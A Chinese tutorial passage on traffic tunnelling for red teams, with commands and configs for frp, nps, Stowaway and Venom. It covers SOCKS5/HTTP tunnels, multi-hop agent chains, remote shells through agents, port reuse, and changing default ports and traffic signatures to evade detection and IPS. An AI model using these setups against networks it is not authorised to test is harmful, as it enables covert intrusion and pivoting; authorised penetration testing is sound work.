<p>需要注意的是，流量隧道技术在某些情况下可能违反法律或网络使用政策，特别是在某些国家或组织中。在使用流量隧道技术之前，请确保遵守当地的法律法规，并尊重网络服务提供商的使用条款和政策。</p>
<blockquote>
</blockquote>
<hr>
<h2 id="使用流量隧道的意义-✍️"><a href="#使用流量隧道的意义-✍️" class="headerlink" title="使用流量隧道的意义 ✍️"></a>使用流量隧道的意义 ✍️</h2><ul>
<li>隐藏数据流量的真实源地址和目标地址。通过流量隧道,可以隐藏数据流经的真实网络路径,使得流量难以被追踪和监视。</li>
<li>逾越地域限制访问 blocked 网站。流量隧道可以将流量隧道出国外,从而实现跨越防火墙或地域限制访问 blocked 网站。</li>
<li>提高访问安全性。使用流量隧道可以加密传输数据流量,提高数据在传输过程中的保密性和完整性,防止中间人攻击。</li>
<li>缓解网络拥堵。通过流量隧道可以将流量定向转发到带宽充足的网络节点,有效利用较高速的国外网络线路,减轻源网络拥堵的压力。</li>
<li>实现网上匿名通信。通过流量隧道可以隐藏客户端真实IP,实现一定程度上的网上匿名访问,保护个人隐私。</li>
<li>避开地域限制。有些网站会根据访问用户的来源地域限制访问权限。通过流量隧道可以欺骗网站并隐藏真实地域,实现境外网站的完整访问。</li>
<li>绕过网络封锁，一些网络环境中可以使用特定端口，特定协议实现绕过，从而突破网络防火墙。</li>
</ul>
<h2 id="对于渗透测试红队-👨‍🏭"><a href="#对于渗透测试红队-👨‍🏭" class="headerlink" title="对于渗透测试红队 👨‍🏭"></a>对于渗透测试红队 👨‍🏭</h2><ul>
<li>隐瞒源地址,规避检测</li>
<li>实现内网渗透跳板</li>
<li>加强后渗透隐蔽性</li>
<li>绕过IPS防御</li>
<li>DNS 隧道</li>
<li>ICMP 隧道</li>
</ul>
<h2 id="正向代理反向代理"><a href="#正向代理反向代理" class="headerlink" title="正向代理反向代理"></a>正向代理反向代理</h2><blockquote>
<p><strong>正向代理和反向代理是两种常见的网络代理形式:</strong></p>
<p>正向代理(Forward Proxy):</p>
<ul>
<li>客户端直接连接到代理服务器,由代理服务器来连接外部服务和资源。</li>
<li>代理服务器位于客户端和目标服务器之间,它接受客户端的所有请求,然后向目标服务器发出请求并将响应返回给客户端。</li>
</ul>
<p>优点:可以隐藏客户端的真实IP地址,提供流量监控和内容过滤功能。</p>
<p>反向代理(Reverse Proxy):</p>
<ul>
<li>客户端直接连接到目标服务器,而非通过反向代理服务器。</li>
<li>反向代理服务器位于目标服务器前面,它向外界提供一致的接口,而后端可以部署多台服务器。</li>
</ul>
</blockquote>
<hr>
<h1 id="实现"><a href="#实现" class="headerlink" title="实现"></a>实现</h1><h2 id="Frp"><a href="#Frp" class="headerlink" title="Frp"></a>Frp</h2><blockquote>
<p>frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议，且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。<br>项目地址：<a href="https://github.com/fatedier/frp">https://github.com/fatedier/frp</a></p>
</blockquote>
<p>公网 IP 的节点部署 frp 服务端，实现将内网服务穿透到公网，功能特性</p>
<ul>
<li>客户端服务端通信支持 TCP、QUIC、KCP 以及 Websocket 等多种协议。</li>
<li>采用 TCP 连接流式复用，在单个连接间承载更多请求，节省连接建立时间，降低请求延迟。</li>
<li>代理组间的负载均衡。</li>
<li>端口复用，多个服务通过同一个服务端端口暴露。</li>
<li>支持 P2P 通信，流量不经过服务器中转，充分利用带宽资源。</li>
<li>多个原生支持的客户端插件（静态文件查看，HTTPS&#x2F;HTTP 协议转换，HTTP、SOCK5 代理等），便于独立使用 frp 客户端完成某些工作。</li>
<li>高度扩展性的服务端插件系统，易于结合自身需求进行功能扩展。</li>
</ul>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><aside>
⚙ 下载地址：https://github.com/fatedier/frp/releases

</aside>

<ol>
<li>解压下载的压缩包。</li>
<li>将 <code>frpc</code> 复制到内网服务所在的机器上。客户端</li>
<li>将 <code>frps</code> 复制到拥有公网 IP 地址的机器上，并将它们放在任意目录。服务器端</li>
</ol>
<h3 id="参数详解"><a href="#参数详解" class="headerlink" title="参数详解"></a>参数详解</h3><blockquote>
<p><strong>frps</strong></p>
</blockquote>
<ul>
<li><code>completion</code>  为指定的shell生成自动完成脚本，例：<code>frps completion zsh</code></li>
<li><code>help</code> <code>-h  --help</code> 显示使用帮助，例：<code>frps help</code> ，<code>frps --log_level -h</code></li>
<li><code>verify</code>  验证配置是否有效，例：<code>frps verify -c frps.toml</code></li>
<li><code>--allow_ports string</code>   允许端口</li>
<li><code>--bind_addr string</code> 绑定的 ip 地址 (default “0.0.0.0”)</li>
<li><code>-p, --bind_port int</code>  绑定端口  (default 7000)</li>
<li><code>-c, --config string</code> 指定配置文件</li>
<li><code>--dashboard_addr string</code> 仪表盘地址 (default “0.0.0.0”)</li>
<li><code>--dashboard_port int</code> 仪表盘端口</li>
<li><code>--dashboard_pwd string</code> 仪表盘密码 (default “admin”)</li>
<li><code>--dashboard_user string</code> 仪表盘用户 (default “admin”)</li>
<li><code>--dashboard_tls_cert_file string</code> 仪表盘TLS证书文件</li>
<li><code>--dashboard_tls_key_file string</code> 仪表盘 TLS 密钥文件</li>
<li><code>--dashboard_tls_mode</code> 如果启用仪表盘TLS模式</li>
<li><code>--disable_log_color</code>  在控制台禁用日志颜色</li>
<li><code>--enable_prometheus</code> 启用 prometheus 仪表板</li>
<li><code>--kcp_bind_port int</code>   KCP绑定udp端口</li>
<li><code>--log_file string</code>   日志文件(默认”console”)</li>
<li><code>--log_level string</code>  日志级别(默认”info”)，可选，<code>trace debug info warn error</code></li>
<li><code>--log_max_days int</code>  日志最大天数(默认3)</li>
<li><code>--max_ports_per_client int</code>    每个端口的最大客户端数量</li>
<li><code>--proxy_bind_addr string</code>  代理绑定地址(默认为“0.0.0.0”)</li>
<li><code>--subdomain_host string</code>   子域主机</li>
<li><code>--tls_only</code>  仅使用 TLS</li>
<li><code>-t, --token string</code>   验证token</li>
<li><code>-v --version</code>     显示版本</li>
<li><code>--vhost_http_port int</code> vhost 的http 端口</li>
<li><code>--vhost_http_timeout int</code>  vhost HTTP响应头超时(默认60)</li>
<li><code>--vhost_https_port int</code>   vhost HTTPS端口</li>
</ul>
<blockquote>
<p><strong>frpc</strong></p>
</blockquote>
<ul>
<li><code>completion</code> 为指定的shell生成自动完成脚本 ，例：frpc completion bash</li>
<li><code>help</code>    查看帮助选项，<code>frpc help  or  frpc help http</code></li>
<li><code>http</code>    单个http代理运行frpc</li>
<li><code>https</code>   单个https代理运行frpc</li>
<li><code>nathole</code>  关于nathole的动作</li>
<li><code>reload</code> 热加载frpc配置</li>
<li><code>status</code>  所有代理状态概述</li>
<li><code>stcp</code>   使用单个stcp代理运行frpc</li>
<li><code>stop</code>  停止运行中的frpc</li>
<li><code>sudp</code>  使用单个sudp 代理运行frpc</li>
<li><code>tcp</code>  使用单个tcp代理运行frpc</li>
<li><code>tcpmux</code>  使用单个tcpmux代理运行frpc</li>
<li><code>udp</code>  使用单个udp代理运行frpc</li>
<li><code>verify</code> 验证配置是否有效</li>
<li><code>xtcp</code>  使用单个xtcp代理运行frpc</li>
<li><code>-c, --config string</code> 指定frpc配置文件 (default “.&#x2F;frpc.ini”)</li>
<li><code>--config_dir string config directory</code>   指定配置文件目录，为配置目录中的每个文件运行一个FRPC服务</li>
<li><code>-v</code>   显示版本</li>
<li>使用“<code>frpc [command] --help</code>”获取命令的更多信息。</li>
</ul>
<h3 id="常用方式"><a href="#常用方式" class="headerlink" title="常用方式"></a>常用方式</h3><blockquote>
<p><strong>建立 http 隧道进行内网穿透</strong></p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**服务端**</span><br><span class="line">frps --bind_addr <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span> -p <span class="number">7001</span> --kcp_bind_port <span class="number">7001</span>  监听端口</span><br><span class="line"></span><br><span class="line">**客户端配置文件 frpc -c frpc.<span class="property">toml</span></span><br><span class="line">frpc.<span class="property">toml</span> 配置文件内容**</span><br><span class="line"># 指定连接目标服务器的 ip 地址与端口</span><br><span class="line">serverAddr = <span class="string">&quot;you remote ip&quot;</span></span><br><span class="line">serverPort = port</span><br><span class="line"></span><br><span class="line"># 建立http隧道,隧道端口设置为<span class="number">7002</span>，tcp协议，数据加密，压缩，设置隧道连接账户密码</span><br><span class="line">[[proxies]]</span><br><span class="line">name = <span class="string">&quot;plugin_http_proxy&quot;</span></span><br><span class="line">type = <span class="string">&quot;tcp&quot;</span></span><br><span class="line">remotePort = <span class="number">7002</span></span><br><span class="line">transport.<span class="property">useEncryption</span> = <span class="literal">true</span></span><br><span class="line">transport.<span class="property">useCompression</span> = <span class="literal">true</span></span><br><span class="line">[proxies.<span class="property">plugin</span>]</span><br><span class="line">type = <span class="string">&quot;http_proxy&quot;</span></span><br><span class="line">httpUser = <span class="string">&quot;admin&quot;</span></span><br><span class="line">httpPassword = <span class="string">&quot;passwd&quot;</span></span><br><span class="line"></span><br><span class="line">运行后会在服务端看到<span class="number">7002</span>端口监听，为http隧道。连接后实现内网穿透，http隧道。</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>建立 Socks5 隧道进行内网穿透</strong></p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**服务端**</span><br><span class="line">frps --bind_addr <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span> -p <span class="number">7001</span> --kcp_bind_port <span class="number">7001</span> 监听端口</span><br><span class="line"></span><br><span class="line">**客户端配置文件 frpc -c frpc.<span class="property">toml</span></span><br><span class="line">frpc.<span class="property">toml</span> 配置文件内容**</span><br><span class="line">#指定服务端ip和端口</span><br><span class="line">serverAddr = <span class="string">&quot;you remote ip&quot;</span></span><br><span class="line">serverPort = <span class="number">7001</span></span><br><span class="line"></span><br><span class="line"># 设置socks5隧道，隧道端口<span class="number">7002</span>,tcp协议，数据加密，压缩，设置隧道账户，密码</span><br><span class="line">[[proxies]]</span><br><span class="line">name = <span class="string">&quot;plugin_socks5&quot;</span></span><br><span class="line">type = <span class="string">&quot;tcp&quot;</span></span><br><span class="line">remotePort = <span class="number">7002</span></span><br><span class="line">transport.<span class="property">useEncryption</span> = <span class="literal">true</span></span><br><span class="line">transport.<span class="property">useCompression</span> = <span class="literal">true</span></span><br><span class="line">[proxies.<span class="property">plugin</span>]</span><br><span class="line">type = <span class="string">&quot;socks5&quot;</span></span><br><span class="line">username = <span class="string">&quot;admin&quot;</span></span><br><span class="line">password = <span class="string">&quot;passwd&quot;</span></span><br><span class="line"></span><br><span class="line">运行后会在服务端开启socks5代理。实现内网穿透，socks5代理隧道</span><br></pre></td></tr></table></figure>

<aside>
💢 代理类型，可选值为 tcp, udp, http, https, tcpmux, stcp, sudp, xtcp。

</aside>

<blockquote>
<p><strong>官方文档</strong><br><a href="https://gofrp.org/zh-cn/docs/">https://gofrp.org/zh-cn/docs/</a><br><a href="https://github.com/fatedier/frp">https://github.com/fatedier/frp</a></p>
</blockquote>
<hr>
<h2 id="Nps"><a href="#Nps" class="headerlink" title="Nps"></a>Nps</h2><aside>
💢 nps是一款轻量级、高性能、功能强大的**内网穿透**代理服务器。
协议支持全面，兼容几乎所有常用协议，例如tcp、udp、http(s)、socks5、p2p、http代理…全平台兼容，支持web ui。

</aside>

<blockquote>
<p>安装：<a href="https://github.com/ehang-io/nps/releases">https://github.com/ehang-io/nps/releases</a> 官方版本，多年没有更新，有漏洞，会被反制<strong>，</strong>不推荐<br>*<em><strong>安装</strong>：</em>*<a href="https://github.com/Q16G/npsmodify">https://github.com/Q16G/npsmodify</a>  二次开发魔改版，修复了漏洞，修改了流量特征。喜欢nps的可以尝试这个版本。<br>官方手册：<a href="https://ehang-io.github.io/nps/#/">https://ehang-io.github.io/nps/#/</a></p>
</blockquote>
<ul>
<li>首先下载 ： <a href="https://github.com/Q16G/npsmodify/releases">https://github.com/Q16G/npsmodify/releases</a>  下载对应版本</li>
<li>git clone <a href="https://github.com/Q16G/npsmodify">https://github.com/Q16G/npsmodify</a>  随后把项目clone 下来</li>
<li>（1）在使用服务端的时候需要down下来 cmd&#x2F;nps下的conf和web两个目录</li>
<li>（2）把conf和web两个目录和nps目录同级</li>
<li>（3）修改服务端密码（后期也许会支持md5、或者登陆后修改密码）最新版默认使用good.conf</li>
</ul>
<blockquote>
<p><strong>使用方式</strong></p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">sudo ./linux_amd64_nps  启动nps服务端</span><br><span class="line">访问 服务端 <span class="number">8080</span> web页面登陆，默认账户密码 admin/<span class="number">123</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>登陆后点击右侧客户端新增：填写备注，用户,密码，压缩,加密。根据自己需求填写。</li>
<li>随后点击客户端，点新增的客户端的加号+。会提示命令连接</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">例如：</span><br><span class="line">sudo ./linux_amd64_npc -server=<span class="attr">localhost</span>:<span class="number">8024</span> -vkey=srsia6n0evfc9s3b -type=tcp</span><br></pre></td></tr></table></figure>

<blockquote>
<p>TCP隧道</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">适用范围： ssh、远程桌面等tcp连接场景</span><br><span class="line">假设场景： 想通过访问公网服务器<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>的<span class="number">8001</span>端口，连接内网机器<span class="number">10.1</span><span class="number">.50</span><span class="number">.101</span>的<span class="number">22</span>端口，实现ssh连接</span><br><span class="line"></span><br><span class="line">在刚才创建的客户端隧道管理中添加一条tcp隧道，填写监听的端口（<span class="number">8001</span>）、内网目标ip和目标端口（<span class="number">10.1</span><span class="number">.50</span><span class="number">.101</span>:<span class="number">22</span>），保存。</span><br><span class="line"></span><br><span class="line">访问公网服务器ip（<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>）,填写的监听端口(<span class="number">8001</span>)，相当于访问内网<span class="title function_">ip</span>(<span class="number">10.1</span><span class="number">.50</span><span class="number">.101</span>):目标端口(<span class="number">22</span>)</span><br><span class="line"></span><br><span class="line">例如：ssh -p <span class="number">8001</span> root@<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>UDP隧道</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">适用范围： 内网dns解析等udp连接场景</span><br><span class="line">假设场景： 内网有一台dns（<span class="number">10.1</span><span class="number">.50</span><span class="number">.102</span>:<span class="number">53</span>），在非内网环境下想使用该dns，公网服务器为<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span></span><br><span class="line"></span><br><span class="line">在刚才创建的客户端的隧道管理中添加一条udp隧道，填写监听的端口（<span class="number">53</span>）、内网目标ip和目标端口（<span class="number">10.1</span><span class="number">.50</span><span class="number">.102</span>:<span class="number">53</span>），保存。</span><br><span class="line">修改需要使用的dns地址为<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>，则相当于使用<span class="number">10.1</span><span class="number">.50</span><span class="number">.102</span>作为dns服务器</span><br></pre></td></tr></table></figure>

<blockquote>
<p>Scosk 5 代理隧道</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">适用范围： 在外网环境下如同使用vpn一样访问内网设备或者资源</span><br><span class="line">假设场景： 想将公网服务器<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>的<span class="number">8003</span>端口作为socks5代理，达到访问内网任意设备或者资源的效果</span><br><span class="line"></span><br><span class="line">在刚才创建的客户端隧道管理中添加一条socks5代理，填写监听的端口（<span class="number">8003</span>），保存。</span><br><span class="line">在外网环境的本机配置socks5代理，ip为公网服务器ip（<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>），端口为填写的监听端口(<span class="number">8003</span>)，即可访问内网。</span><br></pre></td></tr></table></figure>

<blockquote>
<p>Http 代理隧道</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">适用范围： 在外网环境下使用http正向代理访问内网站点</span><br><span class="line">假设场景： 想将公网服务器<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>的<span class="number">8004</span>端口作为http代理，访问内网网站</span><br><span class="line"></span><br><span class="line">在刚才创建的客户端隧道管理中添加一条http代理，填写监听的端口</span><br><span class="line">在外网环境的本机配置http代理，ip为公网服务器ip（<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>），端口为填写的监听端口(<span class="number">8004</span>)，即可访问内网</span><br></pre></td></tr></table></figure>

<h3 id="优化"><a href="#优化" class="headerlink" title="优化"></a>优化</h3><aside>
🔑 配置文件详解，服务端

</aside>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">web_port 	web管理端口</span><br><span class="line">web_password 	web界面管理密码</span><br><span class="line">web_username 	web界面管理账号</span><br><span class="line">web_base_url 	web管理主路径,用于将web管理置于代理子路径后面</span><br><span class="line">bridge_port 	服务端客户端通信端口</span><br><span class="line">https_proxy_port 	域名代理https代理监听端口</span><br><span class="line">http_proxy_port 	域名代理http代理监听端口</span><br><span class="line">auth_key 	web api密钥</span><br><span class="line">bridge_type 	客户端与服务端连接方式kcp或tcp</span><br><span class="line">public_vkey 	客户端以配置文件模式启动时的密钥，设置为空表示关闭客户端配置文件连接模式</span><br><span class="line">ip_limit 	是否限制ip访问，<span class="literal">true</span>或<span class="literal">false</span>或忽略</span><br><span class="line">flow_store_interval 	服务端流量数据持久化间隔，单位分钟，忽略表示不持久化</span><br><span class="line">log_level 	日志输出级别</span><br><span class="line">auth_crypt_key 	获取服务端authKey时的aes加密密钥，<span class="number">16</span>位</span><br><span class="line">p2p_ip 	服务端<span class="title class_">Ip</span>，使用p2p模式必填</span><br><span class="line">p2p_port 	p2p模式开启的udp端口</span><br><span class="line">pprof_ip 	debug pprof 服务端ip</span><br><span class="line">pprof_port 	debug pprof 端口</span><br><span class="line">disconnect_timeout 	客户端连接超时，单位 5s，默认值 <span class="number">60</span>，即 300s = 5mins</span><br></pre></td></tr></table></figure>

<ul>
<li>尝试修改默认管理端口，登陆用户密码，管理路径，服务端客户端默认8024（特征），尝试修改为其他端口。尝试修改客户端服务端连接协议kcp,tcp,可选，某些情况可能绕过内网封锁。</li>
</ul>
<aside>
🔑 客户端配置文件

</aside>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr=<span class="number">1.1</span><span class="number">.1</span><span class="number">.1</span>:<span class="number">8024</span></span><br><span class="line">conn_type=tcp</span><br><span class="line">vkey=<span class="number">123</span></span><br><span class="line">username=<span class="number">111</span></span><br><span class="line">password=<span class="number">222</span></span><br><span class="line">compress=<span class="literal">true</span></span><br><span class="line">crypt=<span class="literal">true</span></span><br><span class="line">rate_limit=<span class="number">10000</span></span><br><span class="line">flow_limit=<span class="number">100</span></span><br><span class="line">remark=test</span><br><span class="line">max_conn=<span class="number">10</span></span><br><span class="line">#pprof_addr=<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">9999</span></span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>项</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>server_addr</td>
<td>服务端ip&#x2F;域名:port</td>
</tr>
<tr>
<td>conn_type</td>
<td>与服务端通信模式(tcp或kcp)</td>
</tr>
<tr>
<td>vkey</td>
<td>服务端配置文件中的密钥(非web)</td>
</tr>
<tr>
<td>username</td>
<td>socks5或http(s)密码保护用户名(可忽略)</td>
</tr>
<tr>
<td>password</td>
<td>socks5或http(s)密码保护密码(可忽略)</td>
</tr>
<tr>
<td>compress</td>
<td>是否压缩传输(true或false或忽略)</td>
</tr>
<tr>
<td>crypt</td>
<td>是否加密传输(true或false或忽略)</td>
</tr>
<tr>
<td>rate_limit</td>
<td>速度限制，可忽略</td>
</tr>
<tr>
<td>flow_limit</td>
<td>流量限制，可忽略</td>
</tr>
<tr>
<td>remark</td>
<td>客户端备注，可忽略</td>
</tr>
<tr>
<td>max_conn</td>
<td>最大连接数，可忽略</td>
</tr>
<tr>
<td>pprof_addr</td>
<td>debug pprof ip:port</td>
</tr>
</tbody></table>
<hr>
<h2 id="Stowaway"><a href="#Stowaway" class="headerlink" title="Stowaway"></a>Stowaway</h2><aside>
💩 Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具
官方地址：https://github.com/ph4ntonn/Stowaway

</aside>

<blockquote>
<p>功能特性</p>
</blockquote>
<ul>
<li>支持命令补全&#x2F;历史</li>
<li>一目了然的节点树管理</li>
<li>节点间正向&#x2F;反向连接</li>
<li>节点间支持重连</li>
<li>节点间可通过socks5&#x2F;http代理进行连接</li>
<li>节点间可通过ssh隧道连接</li>
<li>节点间流量可选择TCP&#x2F;HTTP</li>
<li>多级socks5流量代理转发,支持UDP&#x2F;TCP,IPV4&#x2F;IPV6</li>
<li>远程shell</li>
<li>上传及下载文件</li>
<li>端口本地&#x2F;远程映射</li>
<li>节点可端口复用</li>
<li>自由开关各类服务</li>
<li>节点间相互认证</li>
<li>节点间流量以AES-256-GCM进行加密</li>
<li>支持各类平台(Linux&#x2F;Mac&#x2F;Windows&#x2F;MIPS&#x2F;ARM)</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="attr">https</span>:<span class="comment">//github.com/ph4ntonn/Stowaway/releases  </span></span><br><span class="line">访问下载地址，下载和系统架构相同的版本</span><br></pre></td></tr></table></figure>

<blockquote>
<p>使用</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">角色</span><br><span class="line">admin 渗透测试者使用的主控端</span><br><span class="line">agent 渗透测试者部署的被控端</span><br><span class="line"></span><br><span class="line">定义</span><br><span class="line">节点: 指admin || agent</span><br><span class="line">主动模式: 指当前操作的节点主动连接另一个节点</span><br><span class="line">被动模式: 指当前操作的节点监听某个端口，等待另一个节点连接</span><br><span class="line">上游: 指当前操作的节点与其父节点之间的流量</span><br><span class="line">下游：指当前操作的节点与其所有子节点之间的流量</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参数详解</p>
</blockquote>
<ul>
<li>admin</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">参数:</span><br><span class="line">-l 被动模式下的监听地址[ip]:&lt;port&gt;</span><br><span class="line">-s 节点通信加密密钥,所有节点(admin&amp;&amp;agent)必须一致</span><br><span class="line">-c 主动模式下的目标节点地址</span><br><span class="line">--socks5-proxy socks5代理服务器地址</span><br><span class="line">--socks5-proxyu socks5代理服务器用户名(可选)</span><br><span class="line">--socks5-proxyp socks5代理服务器密码(可选)</span><br><span class="line">--http-proxy http代理服务器地址</span><br><span class="line">--down 下游协议类型,默认为裸<span class="variable constant_">TCP</span>流量,可选<span class="variable constant_">HTTP</span></span><br></pre></td></tr></table></figure>

<ul>
<li>agent</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">参数:</span><br><span class="line">-l 被动模式下的监听地址[ip]:&lt;port&gt;</span><br><span class="line">-s 节点通信加密密钥</span><br><span class="line">-c 主动模式下的目标节点地址</span><br><span class="line">--socks5-proxy socks5代理服务器地址</span><br><span class="line">--socks5-proxyu socks5代理服务器用户名(可选)</span><br><span class="line">--socks5-proxyp socks5代理服务器密码(可选)</span><br><span class="line">--http-proxy http代理服务器地址</span><br><span class="line">--reconnect 重连时间间隔</span><br><span class="line">--rehost 端口复用时复用的<span class="variable constant_">IP</span>地址</span><br><span class="line">--report 端口复用时复用的端口号</span><br><span class="line">--up 上游协议类型,默认为裸<span class="variable constant_">TCP</span>流量,可选<span class="variable constant_">HTTP</span></span><br><span class="line">--down 下游协议类型,默认为裸<span class="variable constant_">TCP</span>流量,可选<span class="variable constant_">HTTP</span></span><br><span class="line">--cs 运行平台的shell编码类型，默认为utf-<span class="number">8</span>，可选gbk</span><br></pre></td></tr></table></figure>

<aside>
💩 -l -s -c  参数agent和admin功能一致，用法一致

<p>–socks5-proxy&#x2F;–socks5-proxyu&#x2F;–socks5-proxyp&#x2F;–http-proxy</p>
<ul>
<li><code>-socks5-proxy</code>代表socks5代理服务器地址，<code>-socks5-proxyu</code>以及<code>-socks5-proxyp</code>可选</li>
<li><code>-http-proxy</code>代表http代理服务器地址,与socks5使用方式相同</li>
</ul>
<p>–up&#x2F;–down<br>这两个参数admin&amp;&amp;agent用法一致，可用在主动&amp;&amp;被动模式下<br>注意一点，当你设置了某一节点上&#x2F;下游为TCP&#x2F;HTTP流量后，与其连接的父&#x2F;子节点的下&#x2F;上游流量必须设置为一致！！！</p>
</aside>

<blockquote>
<p>端口复用</p>
</blockquote>
<aside>
💩 SO_REUSEPORT和SO_REUSEADDR模式

<p><strong>主要支持windows、mac环境下的复用，linux亦可，但限制较多</strong></p>
<ul>
<li>admin端：<code>./stowaway_admin -c 192.168.0.105:80 -s 123</code></li>
<li>agent端： <code>./stowaway_agent --report 80 --rehost 192.168.0.105 -s 123</code></aside></li>
</ul>
<aside>
💩 IPTABLES模式，**仅支持linux环境下的复用，agent会自动修改IPTABLES，需要root权限**
agent端： `./stowaway_agent --report 22 -l 10000 -s 123`
指定复用端口22，连接端口10000

<p>在agent启动后，请使用<code>script</code>目录下的<code>reuse.py</code></p>
<p>先设置SECRET的值(SECRET的值就是在启动各个节点时所设置的通信密钥),</p>
<p>之后执行：<code>python reuse.py --start --rhost xxx.xxx.xxx.xxx --rport xxx</code></p>
<ul>
<li>-rhost代表agent的地址</li>
<li>-rport代表被复用的端口,在本例中应当为22</li>
</ul>
<p>此时admin端就可以连接：<code>./stowaway_admin -c 192.168.0.105:22 -s 123</code></p>
</aside>

<blockquote>
<p>使用流程</p>
</blockquote>
<aside>
💩 admin端
监听8234端口，不指定ip默认在0.0.0.0（即本机所有ip），指定加密密钥为passwdkey，协议指定http
sudo ./linux_x64_admin -l 8234 -s passwdkey --down http

<p>agent端<br>连接admin端ip,端口8234,指定密钥，重连时间10s,上游协议指定http,下游指定http,上游必须和admin端下游协议一样，不然连接不上。指定shell编码为utf-8,如果是windows指定为gbk。<br>sudo stowaway-agent -c adminip:8234 -s passwdkey –reconnect 10  –up http –down http –cs utf-8</p>
<p>help 命令解析<br>help 命令显示admin下的选项<br>• <code>detail</code>: 展示在线节点的详细信息<br>• <code>topo</code>: 展示在线节点的父子关系<br>• <code>use</code>: 使用某个agent<br>• <code>exit</code>: 退出stowaway</p>
<p>当用户使用<code>use</code>命令选择了一个agent后，进入第二层node panel，其包含的命令如下<br>use下help命令解析<br>• <code>listen</code>: 命令agent监听某个端口并等待子节点的连入</p>
<ol>
<li><code>Normal passive</code>: 此选项意味着agent将会以普通的方式监听在目标端口，并等待子节点连入</li>
<li><code>IPTables Reuse</code>：此选项意味着agent将会以IPTables Reuse的方式复用端口，并等待子节点连入</li>
<li><code>SOReuse</code>：此选项意味着agent将会以SOReuse的方式复用端口，并等待子节点连入</li>
</ol>
<p>• <code>ssh</code>: 命令节点以ssh方式连接目标机器<br>• <code>shell</code>: 获取当前节点的shell<br>• <code>socks</code>：在当前节点上启动socks5服务，<code>socks 7777 &lt;username&gt; &lt;password&gt;</code><br>• <code>stopsocks</code>: 停止在当前节点上的socks5服务<br>• <code>connect</code>: 命令当前节点连接至另一个子节点<br>• <code>sshtunnel</code>: 命令当前节点以ssh隧道的方式连接至另一个子节点<br>• <code>upload</code>: 向当前节点上传文件<br>• <code>download</code>: 下载当前节点上的文件<br>• <code>forward</code>: 映射admin上的端口至远程端口<br>• <code>stopforward</code>: 关闭当前节点的远程映射<br>• <code>backward</code>: 反向映射当前agent上的端口至admin的本地端口<br><code>stopbackward</code>: 关闭当前节点的反向映射<br>• <code>shutdown</code>: 命令当前节点下线<br>• <code>back</code>: 退回到主panel<br>• <code>exit</code>: 退出stowaway</p>
</aside>

<blockquote>
<p>多级网络</p>
</blockquote>
<ul>
<li>admin: <code>./stowaway_admin -l 9999 -s 123</code></li>
<li>agent-1:  <code>./stowaway_agent -c 127.0.0.1:9999 -s 123</code></li>
<li>agent-2:  <code>./stowaway_agent -l 10000 -s 123</code></li>
<li><code>use 0</code> -&gt; <code>connect agent-2的IP:10000</code></li>
</ul>
<hr>
<h2 id="Venom"><a href="#Venom" class="headerlink" title="Venom"></a>Venom</h2><aside>
💩 Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。

<p>Venom可将多个节点进行连接，然后以节点为跳板，构建多级代理。</p>
<p>渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网，并轻松地管理代理节点。<br>地址：<a href="https://github.com/Dliv3/Venom">https://github.com/Dliv3/Venom</a></p>
</aside>

<blockquote>
<p>特点</p>
</blockquote>
<ul>
<li>可视化网络拓扑</li>
<li>多级socks5代理</li>
<li>多级端口转发</li>
<li>端口复用 (apache&#x2F;mysql&#x2F;…)</li>
<li>ssh隧道</li>
<li>交互式shell</li>
<li>文件的上传和下载</li>
<li>节点间通信加密</li>
<li>跨平台(Linux&#x2F;Windows&#x2F;MacOS)和多种架构(x86&#x2F;x64&#x2F;arm&#x2F;mips)</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><a href="https://github.com/Dliv3/Venom/releases">https://github.com/Dliv3/Venom/releases</a>  下载对应系统版本安装</li>
</ul>
<blockquote>
<p>参数详解</p>
</blockquote>
<ul>
<li>admin</li>
</ul>
